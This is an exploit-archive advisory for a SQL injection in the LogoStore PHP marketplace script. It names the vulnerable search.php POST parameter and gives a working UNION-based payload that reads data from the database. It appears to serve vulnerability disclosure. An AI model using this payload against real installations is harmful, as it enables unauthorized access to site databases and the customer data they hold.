LogoStore - SQL Injection Vulnerability

2017-02-01T00:00:00
ID 1337DAY-ID-26861
Type zdt
Reporter Kaan KAMIS
Modified 2017-02-01T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            Exploit Title: LogoStore - SQL Injection
Software Link: https://codecanyon.net/item/logostore-buy-and-sell-logos-online/19379630
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
 
Overview
 
LogoStore is a web application that allows you to buy and sell logos online. Manage logos within your account, check others logos and sell your own!
 
Type of vulnerability:
 
An SQL Injection vulnerability in LogoStore allows attackers to read
arbitrary data from the database.
 
Vulnerable URL : http://locahost/LogoStore/search.php
Mehod : POST
Parameter : query
 
Simple Payload:
Type: UNION query
Payload: query=test' UNION ALL SELECT CONCAT(CONCAT('qqkkq','VnPVWVaYxljWqGpLLbEIyPIHBjjjjASQTnaqfKaV'),'qvvpq'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- oCrh&search=

#  0day.today [2018-02-19]  #